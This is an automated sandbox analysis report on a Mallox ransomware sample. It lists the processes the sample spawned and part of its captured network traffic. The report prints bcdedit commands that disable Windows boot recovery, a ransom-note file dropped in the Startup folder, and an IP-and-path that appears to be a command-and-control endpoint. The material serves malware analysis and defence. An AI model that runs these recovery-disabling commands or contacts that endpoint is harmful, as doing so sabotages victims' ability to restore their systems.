                    Data Ascii: iv class="info-heading"> d91.215.85.14219/QWEwqdsvsf/ap.php (port 28073) </div> </li> <li class="info-server">107</
                    Nov 5, 2024 13:23:35.762063980 CET399INData Raw: 6c 2e 63 6f 6d 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 63 70 61 6e 65 6c 77 68 6d 26 75 74 6d 5f 6d 65 64 69 75 6d 3d 63 70 6c 6f 67 6f 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 6c 6f 67 6f 6c 69 6e 6b 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 0d 0a
                    Data Ascii: l.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=131404referral" target="cpanel" title="cPanel, Inc."> <img src="/img-sys/powered_by_cpanel.svg" height="20" alt="cPanel, Inc." />


                    Statistics

                    CPU Usage

                    Click to jump to process

                    Memory Usage

                    Click to jump to process

                    High Level Behavior Distribution

                    Click to dive into process behavior distribution

                    Behavior

                    Click to jump to process

                    System Behavior

                    General

                    Target ID:0
                    Start time:07:23:17
                    Start date:05/11/2024
                    Path:C:\Users\user\Desktop\Ransomware Mallox.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Users\user\Desktop\Ransomware Mallox.exe"
                    Imagebase:0x7ff67eb70000
                    File size:354'304 bytes
                    MD5 hash:9099859494363864DE61FB30D6C201E6
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:low
                    Has exited:false

                    General

                    Target ID:2
                    Start time:07:23:18
                    Start date:05/11/2024
                    Path:C:\Windows\System32\cmd.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Windows\System32\cmd.exe" /c bcdedit /set {current} bootstatuspolicy ignoreallfailures
                    Imagebase:0x7ff787b80000
                    File size:289'792 bytes
                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    General

                    Target ID:3
                    Start time:07:23:18
                    Start date:05/11/2024
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff620390000
                    File size:862'208 bytes
                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    General

                    Target ID:4
                    Start time:07:23:18
                    Start date:05/11/2024
                    Path:C:\Windows\System32\cmd.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Windows\System32\cmd.exe" /c bcdedit /set {current} recoveryenabled no
                    Imagebase:0x7ff787b80000
                    File size:289'792 bytes
                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    General

                    Target ID:5
                    Start time:07:23:18
                    Start date:05/11/2024
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff620390000
                    File size:862'208 bytes
                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    General

                    Target ID:6
                    Start time:07:23:18
                    Start date:05/11/2024
                    Path:C:\Windows\System32\bcdedit.exe
                    Wow64 process (32bit):false
                    Commandline:bcdedit /set {current} bootstatuspolicy ignoreallfailures
                    Imagebase:0x7ff76e9c0000
                    File size:491'864 bytes
                    MD5 hash:74F7B84B0A547592CA63A00A8C4AD583
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:moderate
                    Has exited:true

                    General

                    Target ID:7
                    Start time:07:23:18
                    Start date:05/11/2024
                    Path:C:\Windows\System32\bcdedit.exe
                    Wow64 process (32bit):false
                    Commandline:bcdedit /set {current} recoveryenabled no
                    Imagebase:0x7ff76e9c0000
                    File size:491'864 bytes
                    MD5 hash:74F7B84B0A547592CA63A00A8C4AD583
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:moderate
                    Has exited:true

                    General

                    Target ID:13
                    Start time:07:23:59
                    Start date:05/11/2024
                    Path:C:\Windows\System32\notepad.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HOW TO BACK FILES.txt
                    Imagebase:0x7ff7b5420000
                    File size:201'216 bytes
                    MD5 hash:27F71B12CB585541885A31BE22F61C83
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:moderate
                    Has exited:false

                    Disassembly

                    No disassembly